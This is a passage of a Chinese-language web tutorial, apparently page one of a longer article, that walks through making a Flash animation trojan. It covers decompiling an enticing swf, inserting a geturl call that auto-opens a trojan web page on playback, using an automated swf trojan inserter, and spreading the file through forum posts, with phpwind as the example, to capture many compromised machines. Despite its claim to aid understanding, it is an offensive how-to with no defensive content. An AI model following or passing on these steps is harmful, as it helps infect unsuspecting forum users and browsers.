木马(Trojan)，您一定不再陌生，当网络安全、信息安全越来越受到人们重视时，木马(Trojan)并没有削弱对网民伤害，甚至出现了越演越烈的趋势，专家甚至指出我过已经进入了木马(Trojan)时代。编者将给用户呈现flash木马(Trojan)的制作过程，让您对木马(Trojan)有一个更深刻的理解。

 
　　一、制作flash动画木马的准备 

　　flash动画木马的原理，是在网页中显示或本地直接播放flash动画木马时，让flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。 

　　另外，我们还需要准备一个比较吸引人的flash动画文件“mm热舞.swf”，以及flash动画反编译工具“闪客精灵”，编辑工具macromedia flash mx。 

　　二、最原始的flash木马 

　　现在虽然有了许多各种各样的flash动画木马制作工具，但是为了了解flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个flash木马。 

　　步骤一：反编译swf动画 

　　首先我们需要将要插入网页木马的flash动画文件“mm热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件” →“快速打开”命令，指定“mm热舞.swf”文件将其导入。然后点击工具栏上的“导出fla”命令，将动画导出为“mm热舞.fla”文件。 

　　步骤二：插入网页木马代码 

　　然后运行flash动画编辑器macromedia flash mx，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的 “geturl”命令，在右边窗口中的“url”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用get方式发送”，在下方的代码窗口中将出现“geturl("http://网页木马地址", "_blank", "get");”。 

　　步骤三：生成flash木马 

　　设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为swf格式。用ie浏览器打开刚才生成的flash动画木马，可以看到随着flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。$page_devide$ 

　　三、简简单单生成flash木马 

　　上面插入木马的过程比较麻烦，下面我们介绍一个简单的方法，也正是这些简单的工具使得flash木马在网上随处可见。 

　　运行swf木马插入器，点击界面中的“选择”按钮，浏览指定要插入木马的swf文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的 “只解压”项。设置完毕后，点击“给我插”按钮，程序提示开始插入木马网页。显示成功信息后，关闭程序，用ie打开生成的动画，可以看到自动跳转到木马网页去了。 

　　四、flash木马的利用 

　　看到上面的步骤了吧，生成一个flash动画木马是不是很简单?那么生成的flash木马该如何应用呢?只要我们将flash上传到某个网站中，就可以通过论坛或网站之类的直接利用了。 

　　大部分的论坛中都可以发来flash动画的帖子，利用论坛发帖，攻击者可以快速获得大量的肉鸡。以phpwind v4.3.2 论坛为例，在发帖或回复时，点击编辑窗口上方的“插入flash动画”按钮，设置flash窗口大小，使用默认设置后，要求输入flash的url地址。确定后，可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp: //www.flash**.com.cn/upfiles/20067**.swf(/flash)””，这就是完整的flash播放代码了，不同的论坛代码是不一样的。 
 

本文章更多内容：1 - 2 - 下一页>>

本页地址